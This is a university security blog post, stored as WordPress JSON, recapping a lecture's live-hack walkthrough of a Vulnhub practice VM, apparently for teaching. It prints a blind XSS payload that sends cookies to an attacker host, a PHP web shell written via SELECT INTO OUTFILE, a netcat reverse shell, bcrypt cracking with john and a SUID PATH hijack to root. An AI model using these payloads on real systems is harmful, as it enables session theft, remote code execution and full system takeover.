{"id":10939,"date":"2020-09-11T16:39:52","date_gmt":"2020-09-11T14:39:52","guid":{"rendered":"https:\/\/blog.mi.hdm-stuttgart.de\/?p=10939"},"modified":"2020-09-11T17:07:39","modified_gmt":"2020-09-11T15:07:39","slug":"how-are-vulnerabilities-exploited-to-compromise-a-system","status":"publish","type":"post","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2020\/09\/11\/how-are-vulnerabilities-exploited-to-compromise-a-system\/","title":{"rendered":"How are vulnerabilities exploited to compromise a system?"},"content":{"rendered":"\n<p><em>This article is a recap of the &#8220;Live Hack&#8221; presentation, held in the lecture &#8220;Sichere Systeme&#8221; in SS 2020. It will introduce different vulnerabilities like XSS and SQL-Injection and shows how passwords can be cracked under certain circumstances. The last step explains how a SUID binary was exploited to gain root access on the target system.<\/em><\/p>\n\n\n\n<!--more-->\n\n\n\n<p class=\"has-large-font-size\">Introduction<\/p>\n\n\n\n<p>The Goal of the Live Hack presentation was to show how different vulnerabilities can be exploited to compromise a system with the ultimate goal to gain root privileged access. For that, a suitable VM from vulnhub.com was selected. Vulnhub is a website that provides materials for users to gain &#8220;hands-on&#8221; experience in the field of cyber security. The VM &#8220;Credit Card Scammers: 1&#8221; was chosen for its realistic and interesting vulnerabilities. The presentation was structured with an agenda inspired by the Cyber Kill Chain and explained different stages of a cyber attack with practical &#8220;hands-on&#8221; examples on the target VM. The stages used were:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Recon<\/li><li>Weaponization<\/li><li>Deliver<\/li><li>Exploitation<\/li><li>Privilege Escalation<\/li><\/ul>\n\n\n\n<p>The Privilege Escalation again includes Recon, Weaponization, Deliver and Exploitation stages.<\/p>\n\n\n\n<p class=\"has-large-font-size\">Recon<\/p>\n\n\n\n<p>The mission in the first stage was to get as much information about the target as possible. This information can then later be used to identify vulnerabilities which might be used to get the first access on the system. Gathering information is not only limited to technical information like IP addresses, open ports, domain names, etc. . In a real world scenario valuable information also includes information about employees which could be found on social media among other things. As the scope of this target was a single VM with one IP address, the first thing done was a scan with the network tool Nmap that can be used to discover open Ports, the target operation system and much more. The below result of the command has been shortend to only show important that is important in this case.<\/p>\n\n\n\n<p class=\"has-normal-font-size\"><code class=\"\" data-line=\"\"># nmap -sS -sV -O -p- -oN nmap_result.txt &lt;victim-ip&gt;&lt;br&gt;    22 tcp open ssh   OpenSSH 8.0 (protocol 2.0)&lt;br&gt;    80\/tcp open http  Apache httpd 2.4.37 ((centos))&lt;br&gt;    Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux<\/code><br>         <code class=\"\" data-line=\"\">3.2 - 4.9 (96%), ...&lt;br&gt;    1 IP address (1 host up) scanned in 237.94 seconds<\/code><\/p>\n\n\n\n<p class=\"has-normal-font-size\">Command options: <br><code class=\"\" data-line=\"\">-sS<\/code>      TCP SYN-Scan<br><code class=\"\" data-line=\"\">-sV<\/code>      tries to gather information about services running on open ports<br><code class=\"\" data-line=\"\">-O<\/code>         enable OS detection<br><code class=\"\" data-line=\"\">-p-<\/code>      scan all ports<br><code class=\"\" data-line=\"\">-oN<\/code>      output scan in normal text to file.<\/p>\n\n\n\n<p>The output shows two running services on port 22 and 80 which were identified by Nmap to be SSH and an Apache webserver. With this information we browsed the webserver and we discovered a website running a little shop, where we continue gathering information. To discover files \/ URLs accessible on a server, tools like Dirbuster or Gobuster can be used. They both take a wordlist for a bruteforce approach. With Gobuster we discovered an interesting \/_admin\/ directory where we could find a login page. As we have no valid credentials, we could not get any further yet.<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<p><code class=\"\" data-line=\"\"># gobuster dir -u http:\/\/&lt;victim-ip&gt;\/ -w &lt;br&gt;\/usr\/share\/wordlists\/seclists\/common.txt &gt; directories.txt<\/code><\/p>\n<\/div><\/div>\n\n\n\n<p>Command options:<br><code class=\"\" data-line=\"\">dir <\/code>   do a directory scan<br><code class=\"\" data-line=\"\">-u<\/code>        specifies url<br><code class=\"\" data-line=\"\">-w<\/code>        specifies the wordlist<\/p>\n\n\n\n<p>We continued to browse the website and found a checkout page where users must input their information to complete an order. User inputs of any kind are generally an interesting point in an application as they might be abused by attackers. We found out that the inputs are vulnerable to blind XSS attacks. <\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<p class=\"has-background\" style=\"font-size:clamp(14px, 0.875rem + ((1vw - 3.2px) * 0.073), 15px);px;background-color:#dde2e6\">Blind XSS:<br>We expect our input to be shown somewhere else (can also be another application) which is vulnerable to XSS attacks. For example if an application has an admin panel that shows failed login attempts, we could try to inject a XSS payload within the username or password, which could be shown in the admin panel that might run the XSS payload. Injection points are not limited to input fields, one could also use headers like the user agent, referer or even cookie values.<br>XSS Hunter is a tool which can be used to spray multiple payloads on different injection points and if one is successful it sends a notification via Slack or E-Mail.<\/p>\n<\/div><\/div>\n\n\n\n<p>To find the blind XSS vector, we used the payload<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\">&lt;script&gt;var img = document.createElement(&#039;img&#039;); img.src=&#039;http:\/\/&lt;attacker-ip&gt;\/&#039;;document.body.appendChild(img);&lt;\/script&gt;<\/code><\/p>\n\n\n\n<p>in one of the input fields and started a simple listener on our Host machine:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># python -m SimpleHTTPServer 80<\/code><\/p>\n\n\n\n<p>The payload queries an image from our server and when the browser tries to load it, we see an incoming request at our python server logs.<\/p>\n\n\n\n<p class=\"has-large-font-size\">Weaponization, Deliver and Exploitation<\/p>\n\n\n\n<p>We found enough information in our previouse stage and are ready to exploit the XSS Vulnerability we found. For that we created a new payload which tries to read the cookies from the user and send those to our python server inside the url:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\">&lt;script&gt;var img = document.createElement(&#039;img&#039;); img.src=&#039;http:\/\/&lt;attacker-ip&gt;\/&#039;+document.cookie;document.body.appendChild(img);&lt;\/script&gt;<\/code><\/p>\n\n\n\n<p>As the blind XSS payload got triggered our python server showed the following output:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\">10.0.2.13 - - [10\/Sep\/2020 14:05:28] code 404, message File not found&lt;br&gt;10.0.2.13 - - [10\/Sep\/2020 14:05:28] &quot;GET \/PHPSESSID=kissbhk54cu30ipa2c0l7k1ch6 HTTP\/1.1&quot; 404 -<\/code><\/p>\n\n\n\n<p>The requested URL contains a PHP session cookie! <\/p>\n\n\n\n<p>Next we added the cookie in our browser for the website we found on the target VM and again browsed the \/_admin\/ section. This time we were redirected to an admin panel and not asked to provide a username and password. This is because we have a valid session cookie which we stole from the user who browsed a site that triggered our XSS payload. The admin panel showed all orders including our order which includes our XSS payload. An admin must have checked the orders and in the background the browser executed our payload that sent us the admin&#8217;s cookie. Our next step is again to gather information to find a way to escalate our privileges.<\/p>\n\n\n\n<p class=\"has-large-font-size\">SQL-Injection<\/p>\n\n\n\n<p>Within the admin panel we found a functionality that allows to execute SQL Statements. As it was intendet to insert SQL, it is not really a SQL-Injection but its quite similar. It&#8217;s description was: <em>&#8220;This page allows you to execute SQL commands for deleting and archiving data.&#8221;<\/em> As SQL can be used to write files to the machine and the description said something about archiving data, our next try was to create a file on the server. For that we used the following SQL Command:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\">SELECT &quot;test&quot; INTO OUTFILE &#039;\/var\/www\/html\/test.php&#039;<\/code><\/p>\n\n\n\n<p>If successful, the command creates a file named &#8220;test&#8221; in the<code class=\"\" data-line=\"\"> \/var\/www\/html\/<\/code> directory. We have chosend <code class=\"\" data-line=\"\">\/var\/www\/html<\/code> as the directory as it is the default webroot for apache servers. After we run the command we browsed to the file and saw that it worked as we saw the response &#8220;test&#8221; in the browser. We now ready to prepare a new payload, deliver it and exploit the functionality. As we know the server is running PHP we created a PHP script that lets us execute system commands on the target. <\/p>\n\n\n\n<p><code class=\"\" data-line=\"\">SELECT &quot;&lt;?php system($_GET[&#039;cmd&#039;]); ?&gt;&quot; INTO OUTFILE &#039;\/var\/www\/html\/shell.php&#039;<\/code><\/p>\n\n\n\n<p>The PHP script will extract the <code class=\"\" data-line=\"\">GET <\/code>parameter <code class=\"\" data-line=\"\">cmd <\/code>and execute its value as a system command. With that we already have shell access on the server but it is limited to the privileges of the user (<code class=\"\" data-line=\"\">www<\/code>) that runs the webserver and it is cumbersome to execute commands via the browser. Because of that we entered a command that opens a reverse shell for us. For that we used the command line tool <code class=\"\" data-line=\"\">nc<\/code>. The <code class=\"\" data-line=\"\">-e<\/code> option lets us start a bash process and relays its input and output to the connected peer.  <\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># nc 192.168.100.113 4444 \u2013e \/bin\/bash<\/code><\/p>\n\n\n\n<p>Before running that commend we started a listener that than can use the bash programm over the <code class=\"\" data-line=\"\">nc <\/code>connection:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># nc -lvnp 4444<\/code><\/p>\n\n\n\n<p>As no request was received by our listener, we guessed that a firewall might block uncommon ports and switched from port <code class=\"\" data-line=\"\">4444 <\/code>to port <code class=\"\" data-line=\"\">53 <\/code>which is used for DNS queries. With the new port our listener could receive the request and we now had a shell on the target machine.<\/p>\n\n\n\n<p class=\"has-large-font-size\">Password extraction and cracking<\/p>\n\n\n\n<p>Next we again needed to do some information gathering to find the next attack vector. As we used a SQL-Injection previously, it might be interesting to read the content of the tables as we might be able to extract important information. As the <code class=\"\" data-line=\"\">mysql<\/code> command needed a password for authentication we took a closer look around the webserver files and found a configuration file that was used by the PHP application to connect to the database. As we now had username and password we could inspect all tables. We decided to take a closer look into the user table and found usernames and hashed passwords. As one username (moneygrabber) was the same as a user on the target machine, we next tried to crack his password hash as the user might use the same password. For that we first checked the hash type:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># cat hash.txt | hashid&lt;br&gt;[+] Blowfish(OpenBSD)&lt;br&gt;[+] Woltlab Burning Board 4.x&lt;br&gt;[+] bcrypt<\/code><\/p>\n\n\n\n<p>which showed that it probably was a bcrypt hash. If the user uses a weak password we might still be able to crack it. For that we used john and a preselected wordlist.<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># john -format=bcrypt --wordlist=.\/wordlist.txt .\/hash.txt<\/code><\/p>\n\n\n\n<p>The command line tool <code class=\"\" data-line=\"\">john <\/code>bruteforces all passwords of the wordlist and found the password to be &#8220;delta1&#8221;. Note that this was only possible because the user used a weak password which was included in our wordlist. Next we tried to switch to the user moneygrabber with the given password which worked! To have proper shell access we used the SSH service to get our next shell on the server. (user moneygrabber and password delta1). Now we were in the final recon phase  and needed to find another way to escalate our privileges again.<\/p>\n\n\n\n<p class=\"has-large-font-size\">SUID Exploitation<\/p>\n\n\n\n<p>After lookig for ways to exploit our privileges we found a SUID binary which runs as root and could be executed by our user. To find all SUID binaries owned by root on a system, the following command can be used:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># find \/ -user root -perm -4000 -exec ls -ldb {} \\; &gt;<\/code> <code class=\"\" data-line=\"\">\/tmp\/suids<\/code><\/p>\n\n\n\n<p>This command finds all root owned SUID binaries and writes them to the output file <code class=\"\" data-line=\"\">\/tmp\/suids<\/code>. In the listed binaries we found a suspiciouse binary <code class=\"\" data-line=\"\">\/usr\/bin\/backup<\/code>, which seems to create some backups. For further investigation we inspected to binary with the strings command to extract all human readable strings:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># strings \/usr\/bin\/backup<\/code><\/p>\n\n\n\n<p>the output showed many strings and contained: <code class=\"\" data-line=\"\">\/home\/moneygrabber\/backup.sh<\/code>. It seems like the binary calls that script. Unfortunatly we do not have write privileges on that script so we cant modify it to execute our code. The script contained the following:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># cat \/home\/moneygrabber\/backup.sh&lt;br&gt;    !\/bin\/bash&lt;br&gt;    tar -cf mysql.tar \/var\/lib\/mysql&lt;br&gt;    sleep 30<\/code><\/p>\n\n\n\n<p>Interesting is the fact, that the script executes the tar command, but does not specify the full file path to it. As when we execute the suid binary, our <code class=\"\" data-line=\"\">PATH <\/code>variables are used, we can create an own <code class=\"\" data-line=\"\">tar <\/code>script, add it to the <code class=\"\" data-line=\"\">PATH <\/code>variable so that it gets found before the real <code class=\"\" data-line=\"\">tar <\/code>command and then the SUID binary should execute our script. The script we created only executed bash to open a new shell session. Next we need to add <code class=\"\" data-line=\"\">\/home\/moneygrabber<\/code> at the beginning of the <code class=\"\" data-line=\"\">PATH <\/code>variable as this was the location of our script.<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># export PATH=&quot;\/home\/moneygrabber:$PATH&quot;<\/code><\/p>\n\n\n\n<p>When we now run the SUID binary it executes the <code class=\"\" data-line=\"\">backup.sh<\/code> script which executes our <code class=\"\" data-line=\"\">tar <\/code>script that opens a new shell session. That shell session runs as user root as it was opened by the SUID binary. With that we successfuly gained root privileges on the server!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This article is a recap of the &#8220;Live Hack&#8221; presentation, held in the lecture &#8220;Sichere Systeme&#8221; in SS 2020. It will introduce different vulnerabilities like XSS and SQL-Injection and shows how passwords can be cracked under certain circumstances. The last step explains how a SUID binary was exploited to gain root access on the target system.<\/p>\n","protected":false},"author":1011,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[26],"tags":[],"ppma_author":[819],"class_list":["post-10939","post","type-post","status-publish","format-standard","hentry","category-secure-systems"],"aioseo_notices":[],"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":20850,"url":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2021\/08\/30\/hafnium-exchange-server-attacks-what-happened-and-how-to-protect-yourself\/","url_meta":{"origin":10939,"position":0},"title":"HAFNIUM EXCHANGE SERVER ATTACKS &#8211; What happened and how to protect yourself","author":"Jannik Smidt","date":"30. August 2021","format":false,"excerpt":"an article by Carina Szkudlarek, Niklas Schildhauer and Jannik Smidt This post is going to review the zero day exploit of the Microsoft Exchange Servers starting in January 2021.It will look into the methods of SSRF and the exploitation of mistakes in the deserialization of input values to procure privileged\u2026","rel":"","context":"In &quot;Secure Systems&quot;","block_context":{"text":"Secure Systems","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/category\/system-designs\/secure-systems\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/5.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/5.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/5.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/5.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":3084,"url":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2017\/09\/05\/cloud-security-part-2-the-vulnerabilities-and-threats-of-the-cloud-current-scientific-work-on-cloud-security-conclusion-and-outlook\/","url_meta":{"origin":10939,"position":1},"title":"Cloud Security \u2013 Part 2: The vulnerabilities and threats of the cloud, current scientific work on cloud security, conclusion and outlook","author":"Andreas Fliehr","date":"5. September 2017","format":false,"excerpt":"The second of two blog posts about cloud security. This post covers the vulnerabilities and threats of the cloud, the current scientific work on cloud security and a conclusion and an outlook.","rel":"","context":"In &quot;Cloud Technologies&quot;","block_context":{"text":"Cloud Technologies","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/category\/scalable-systems\/cloud-technologies\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2017\/09\/Structure-of-Nexen.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2017\/09\/Structure-of-Nexen.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2017\/09\/Structure-of-Nexen.png?resize=525%2C300&ssl=1 1.5x"},"classes":[]},{"id":664,"url":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2016\/06\/24\/web-app-file-upload-vulnerabilities\/","url_meta":{"origin":10939,"position":2},"title":"Web App \u2013 File Upload Vulnerabilities","author":"Thomas Derleth","date":"24. June 2016","format":false,"excerpt":"Today we will discuss file upload vulnerabilities; a topic that is widely underestimated by developers. First, we will imagine a website in which it is possible to upload images with the format .jpg, .png, .gif and so on.\u00a0If an application does not have proper form validation for file uploads, an\u2026","rel":"","context":"In &quot;Interactive Media&quot;","block_context":{"text":"Interactive Media","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/category\/interactive-media\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1299,"url":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2016\/08\/16\/exploring-docker-security-part-2-container-flaws\/","url_meta":{"origin":10939,"position":3},"title":"Exploring Docker Security &#8211; Part 2: Container flaws","author":"Patrick Kleindienst","date":"16. August 2016","format":false,"excerpt":"Now that we've understood the basics, this\u00a0second part will\u00a0cover the most relevant container threats, their possible impact as well as\u00a0existent countermeasures. Beyond that, a short overview\u00a0of the most important sources for container threats will be provided. I'm pretty sure you're not counting on most\u00a0of them. Want to know more? Container\u2026","rel":"","context":"In &quot;Secure Systems&quot;","block_context":{"text":"Secure Systems","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/category\/system-designs\/secure-systems\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2023\/08\/article-1301858-0ABD7881000005DC-365_964x543.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2023\/08\/article-1301858-0ABD7881000005DC-365_964x543.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2023\/08\/article-1301858-0ABD7881000005DC-365_964x543.jpg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2023\/08\/article-1301858-0ABD7881000005DC-365_964x543.jpg?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":20309,"url":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2021\/08\/14\/unsafe-programming-languages\/","url_meta":{"origin":10939,"position":4},"title":"Unsafe Languages, Inadequate Defense Mechanisms and Our Dangerous Addiction to Legacy Code","author":"Jan-Niklas Tille","date":"14. August 2021","format":false,"excerpt":"Over the last 20 years, developing secure software has become increasingly important. To this day, we write a significant amount of code in languages with manual memory management. However, the Peter Parker principle states that \u201cgreat power comes with great responsibility\u201d. Many scoring systems classify, enumerate and rank prevalence of\u2026","rel":"","context":"In &quot;Allgemein&quot;","block_context":{"text":"Allgemein","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/category\/allgemein\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":25086,"url":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2023\/07\/28\/botnets-on-wheels-how-hackable-are-connected-autonomous-vehicles-and-what-are-we-doing-about-it\/","url_meta":{"origin":10939,"position":5},"title":"\u201cBotnets on Wheels\u201d \u2013 How Hackable Are Connected Autonomous Vehicles And What Are We Doing About It?","author":"zack walker","date":"28. July 2023","format":false,"excerpt":"Can you imagine the vehicle of the future? The vehicle of the future will not have a steering wheel, no pedals for acceleration and brakes \u2013 you will not be able to drive it at all! Most \u2013 if not all \u2013 of you will have heard a lot about\u2026","rel":"","context":"In &quot;Allgemein&quot;","block_context":{"text":"Allgemein","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/category\/allgemein\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2023\/07\/learning-for-autonomous-driving-header-scaled.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2023\/07\/learning-for-autonomous-driving-header-scaled.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2023\/07\/learning-for-autonomous-driving-header-scaled.jpg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2023\/07\/learning-for-autonomous-driving-header-scaled.jpg?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2023\/07\/learning-for-autonomous-driving-header-scaled.jpg?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2023\/07\/learning-for-autonomous-driving-header-scaled.jpg?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"jetpack_sharing_enabled":true,"authors":[{"term_id":819,"user_id":1011,"is_guest":0,"slug":"jb238","display_name":"Joel Beiter","avatar_url":"https:\/\/secure.gravatar.com\/avatar\/c0defa9229d07dfee323b399c4efa67113c392025962b75591b268157c55d419?s=96&d=mm&r=g","0":null,"1":"","2":"","3":"","4":"","5":"","6":"","7":"","8":""}],"_links":{"self":[{"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/posts\/10939","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/users\/1011"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/comments?post=10939"}],"version-history":[{"count":27,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/posts\/10939\/revisions"}],"predecessor-version":[{"id":11126,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/posts\/10939\/revisions\/11126"}],"wp:attachment":[{"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/media?parent=10939"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/categories?post=10939"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/tags?post=10939"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/ppma_author?post=10939"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}